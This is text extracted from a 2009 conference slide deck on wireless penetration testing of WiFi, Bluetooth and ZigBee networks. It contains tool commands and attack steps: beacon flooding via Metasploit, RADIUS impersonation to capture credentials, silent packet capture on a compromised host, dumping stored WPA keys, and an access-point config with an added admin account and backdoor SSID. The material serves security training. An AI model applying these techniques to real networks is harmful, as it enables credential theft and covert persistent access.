Pen Test Perfect Storm Part 2

Wireless Weaponry

Tools, Tips and Techniques for Effective Wireless Pen Testing

Joshua Wright [email protected] Copyright 2009, All Rights Reserved

Wireless Weaponry - ©2009, Joshua Wright

1

Your Speaker

Chef-Style TFH

• Joshua Wright • Senior Security Analyst, InGuardians • Senior SANS Instructor, Ethical Hacking Wireless course author • [email protected] • [email protected] Wireless Weaponry - ©2009, Joshua Wright

2

Introduction • General false sense of security with regard to wireless – "What, WPA doesn't solve all my problems?!?" (Answer: No, it doesn't)

• Not just WiFi; Bluetooth, ZigBee and proprietary protocols • Wireless Weaponry: Pragmatic tools and techniques for better pen tests Wireless Weaponry - ©2009, Joshua Wright

3

Outline • • • • •

Scanning and Reconnaissance Exploitation Post-Exploitation Wireless Use and Exploitation Evolution Conclusions and Q&A


4

Kismet is a Staple Tool • Kismet Stable has many features that are often overlooked – Multiple simultaneous interfaces – CVS and XML data for post-processing analysis – Controlling channel hopping sequence for more effective coverage

• Kismet Newcore introduces performance, UI, and functionality improvements Wireless Weaponry - ©2009, Joshua Wright

5

Kismet for Pen Testers • One or more high-gain USB cards (ALFA) as primary interface

– One card for channel hopping – Second card for locking the channel hopper for interesting networks

• Atheros PC Card for b/g/a sniffing – Most activity is still on b/g

• Change channel sequence to hop to 1,6,11 more frequently (or 1,4,8,11 if deployed) Hacking Kismet Stable Channel Hopper – 5 channels == ~1 second defaultchannels=IEEE80211g:1,1,1,1,1,7,6,6,6,6,6,4,11,11,11,11,11,8,1,…


6

Kismet Newcore • Not just 802.11 anymore – DECT scanning plugin – ZigBee/802.15.4 scanning in progress

• Not just passive anymore – Plugins actively manipulate the network (not default, but possible)

• Not just analysis anymore – Live PTW WEP cracking, for starters Wireless Weaponry - ©2009, Joshua Wright

7

Cisco Spectrum Expert

~$3000 Wireless Weaponry - ©2009, Joshua Wright

10

Bluetooth Enumeration • Many (all?) Bluetooth devices respond to *:*:AA:BB:CC:DD • Knowing last 3 bytes, can test 256 values to find the target • Optimized using BNAP, BNAP data # ruby bt-uap-search.rb 4 EC:47:86 Contacting 4A:57:00:EC:47:86 using Contacting 4A:57:01:EC:47:86 using Contacting 4A:57:02:EC:47:86 using Contacting 4A:57:03:EC:47:86 using Contacting 4A:57:25:EC:47:86 using Contacting 4A:57:26:EC:47:86 using

hci0 hci1 hci2 hci3

(1/256) (2/256) (3/256) (4/256)

hci1 (38/256) hci3 (39/256)

TARGET FOUND: 4A:57:25:EC:47:86 (hci1)


11

Hey, What Happened to Pragmatism? Bluetooth serial adapter • Scanning for Bluetooth still takes a long time – Not practical or useful to find someone's iPhone (usually)

• Targeted attacks may be worthwhile – Credit card processing systems


12


13




14

Pragmatic Exploitation • Keep an eye out for the little things • Don't let an ad-hoc network pass you by – XP clients, printers common

• Watch guest networks for internal employees (NBNS broadcasts) – Often escaping web filtering – Target these clients directly as guest

• What networks are clients probing for? Wireless Weaponry - ©2009, Joshua Wright

15

Karmetasploit • Magic WiFi from Metasploit project

– "Hi, I'm the network you asked for, and every other network in the world. Here are a bunch of exploits, kthxbye."

• Becoming more difficult to leverage against Vista and XP SP3

– Clients wait to hear beacons from their preferred network before probing

• We can beacon too …


16

Chaka Kahn Wait, what?

• Injects beacons using common SSID's

– Courtesy of the top-SSID list from wigle.net

• Causes clients to think their preferred networks are available, leading to probes

# ./msfconsole -r ssidlist.rc =[ + -- --=[ + -- --=[ =[

msf v3.3-dev 295 exploits - 124 payloads 17 encoders - 6 nops 60 aux

resource> use auxiliary/dos/wireless/ssidlist_beacon resource> set DRIVER madwifing DRIVER => madwifing resource> set INTERFACE wifi0 INTERFACE => wifi0 resource> set CHANNEL 1 CHANNEL => 1 resource> exploit [*] Sending beacon frames...


17

Exploiting PEAP • Attacking RADIUS server TLS validation by client – Client typically validates cert, but does not enforce a given CN – Client often allowed to accept or reject a new certificate from RADIUS

• FreeRADIUS-WPE: Modified RADIUS server to exploit PEAP, others Wireless Weaponry - ©2009, Joshua Wright

18

RADIUS Impersonation 1. Attacker sniffs network, identifies CA in use 2. Attacker buys wireless cert from same CA for CN "evilhacker.net" 3. Attacker starts FreeRADIUS-WPE with AP using victim SSID 4. Attacker deauth's victim (or waits patiently for a roam operation) 5. Victim connects to attacker AP, gets RADIUS cert 6. Cert is trusted, but not previously observed. Victim is prompted to accept 7. Victim accepts, attacker obtains MS-CHAPv2 credentials, disappears.

2

$$ RADIUS Server

1 S Dea poofe d u th en t icat e 4

Corporate Network

WPA2+PEAP Access Point

3

5 Victim

6

WZC displays name, not CN Wireless Weaponry - ©2009, Joshua CA Wright

19




20

Long-Range WiFi Attacks


21

Client Compromise • Concept: Leverage client compromise to attack internal wireless networks • Vista introduces all-new wireless stack • NDIS 6 requires wireless drivers to support monitor-mode packet capture

– Previously limited to Linux or commercial drivers

• Unfortunately, not exposed in any built-in applications • Tools: vistarfmon, nm2lp (InGuardians), NetMon (Microsoft) Wireless Weaponry - ©2009, Joshua Wright

22

Capturing Vista Wireless Traffic • With RFMON capture, we can use Vista host to discover and attack nets – It's like having a remote Linux box, sort of

• Packet capture supplied by Microsoft NetMon 3.3 – Silent command-line install and capture… no reboot

• Attacker can enumerate, analyze and attack wireless networks seen by victim • No attack tools read NetMon WLAN captures • Solution: nm2lp from InGuardians! Ettercap Kismet

Aircrack-ng

Atty coWP

Internet Compromised Vista Host

Corporate Access Point


Corporate Wireless Client

23

Vista Wireless Power Tools C:\>vistarfmon vistarfmon: Enable and disable monitor mode on Vista NDIS 6 interfaces. Copyright (c) 2008 Joshua Wright Available interface(s): 1. Intel(R) Wireless WiFi Link 4965AGN, Mode: ExSta, State: connected C:\>vistarfmon 1 mon Operation mode set to Monitor. C:\>nmcap /Network "Wireless Network Connection" /Capture WiFi /File wlan.cap Netmon Command Line Capture (nmcap) 3.2.1303.0 Loading Parsers ... Saving info to: C:\\wlan.cap - using circular buffer of size 20.00 MB.

Victim System

C:\>nm2lp nm2lp: Convert NetMon 3.2 capture to libpcap format (version 1.0). Copyright (c) 2008 Joshua Wright Usage: nm2lp C:\>nm2lp wlan.cap wlan.dump

Pen Tester System


24

Extracting Stored Wireless Keys • Dictionary attacks against PSK are mildly interesting – Distributed CUDA-acceleration is fun too

• Biggest issue is the distributed storage of keys and lack of frequent rotation • U3 Autorun fun and WirelessKeyView C:\>wirelesskeyview /stext wlankeys.txt C:\>type wlankeys.txt Network Name (SSID): somethingclever Key Type : WPA-PSK Key (Hex) : 66616d696c79206d6f766965206e6967687400 Key (Ascii) : family movie night


25

Where is that AP/Controller?

Many AP's reveal their IP address in management frames or data frames for management traffic (Cisco Aironet in this example, 172.16.0.92)


26

Attacking AP Management Interface • AP's themselves are useful targets

– Management interfaces exposed on guest networks – Compromised client access to device

• Weak passwords, weak protocols, RADIUS manipulation, cooking theft • Once you control the AP, we can have lots of fun on the network – Especially when the AP is on a .1q port Wireless Weaponry - ©2009, Joshua Wright

27

Ghost in the AP Attack username admin1 privilege 15 secret 5 $1$9Q... username admin2 privilege 1 secret 5 $1$8oR... aaa authentication login local enable interface Dot11Radio0 encryption vlan 101 ciphers aes-ccm ! ssid KJOCorpNet vlan 101 guest-mode authentication network-eap eap_methods ! ssid KJOGuest vlan 156 guest-mode authentication open

Before

username admin1 privilege 15 secret 5 $1$9Q... username admin2 privilege 1 secret 5 $1$8oR... username acoop privilege 15 secret "evilpass" aaa authentication login local enable interface Dot11Radio0 encryption vlan 101 ciphers aes-ccm encryption vlan 1 ciphers aes-ccm encryption vlan 102 ciphers aes-ccm ! ssid KJOCorpNet vlan 101 guest-mode authentication network-eap eap_methods ! ssid KJOGuest vlan 156 guest-mode authentication open ! ! Backdoor network access SSID on mgmt VLAN ssid attackerBackdoorWlan wpa-psk ascii KevinReallyWearsGlasses vlan 1 no guest-mode ! ! Attacking any other accessible VLAN example ssid attackVlan102 wpa-psk ascii YouWontGuessThisWpaPsk vlan 102


Eeek! 28




29

Complacent Wireless Security • My growing concern over wireless security – "Where there is a wireless, there is a way"

• Effective wireless pen testing is not possible in a 2-hour non-obstructive engagement

– And not a practical reflection of an actual attack

• Customer value-add with educated attack concessions

– "Let's talk about the resources of your adversary, and the time they could invest into cracking your WPA-PSK key. We can continue pen-test from there." Wireless Weaponry - ©2009, Joshua Wright

30

Wireless Adoption • Continued wireless adoption reaching new verticals – ZigBee and 802.15.4 growing in popularity for low-power needs (retail, manufacturing)

• Smart Grid wireless technology on every home – WiMAX, cellular or proprietary uplink – ZigBee in the home area network (HAN) Wireless penetration testing incorporates multiple protocols, techniques and skill sets Wireless Weaponry - ©2009, Joshua Wright

31

ZigBee Pen Testing • Current ZigBee lacks robust security

– "Residential" or "standard security" mode == plaintext key delivery OTA – No mutual authentication available

• ZigBee Pro (2007) stack improves security, at the cost of flash, memory, CPU – Will not be adopted by all vendors

• Distributed keys on all devices, hardware key extraction remains viable • New retail profile makes ZigBee a financially viable target for attackers (CC transmissions at stores) – But, you have to find the device first


32

zbfind

"… due to the low-cost nature of ad hoc network devices, one cannot generally assume the availability of tamper resistant hardware. Hence, physical access to a device may yield access to secret keying material and other privileged information, as well as access to the security software and hardware." ZigBee Specification 053474r17, Jan. 2008 33





34

Conclusion • Wireless pen testing has many angles – Not just attacker Æ AP Æ Pwned

• Pragmatic recon, exploit, post-exploit recommendations • Talk to your customer about the best use of your time (and their money) for an effective test • Don't get caught up in a single wireless technology – WiFi, Bluetooth, WiMAX, ZigBee, proprietary are all areas you should be targeting

• Help change your complacent customer's mind about the risks and threats of wireless Wireless Weaponry - ©2009, Joshua Wright

35

Q+A, Resources Joshua Wright Office/Mobile: 401-524-2911

[email protected] [email protected]

www.inguardians.com

www.willhackforsushi.com

SANS Ethical Hacking Wireless Course www.sans.org/training/description.php?mid=3 vistarfmon - www.inguardians.com/tools Kismet Stable - www.kismetwireless.net nm2lp - www.inguardians.com/tools Kismet Newcore - www.kismetwireless.net zbfind - Contact Josh WiFiFoFum - iPhone Store Cisco Spectrum Expert - www.cisco.com/en/US/products/ps9393 Chaka Kahn - www.willhackforsushi.com/code/ssidlist_beacon.rb FreeRADIUS-WPE - www.willhackforsushi.com/?page_id=37 NetMon 3.3 - connect.microsoft.com/site/sitehome.aspx?SiteID=216 wirelesskeyview - www.aspecto-software.com/rw/applications/wififofum


36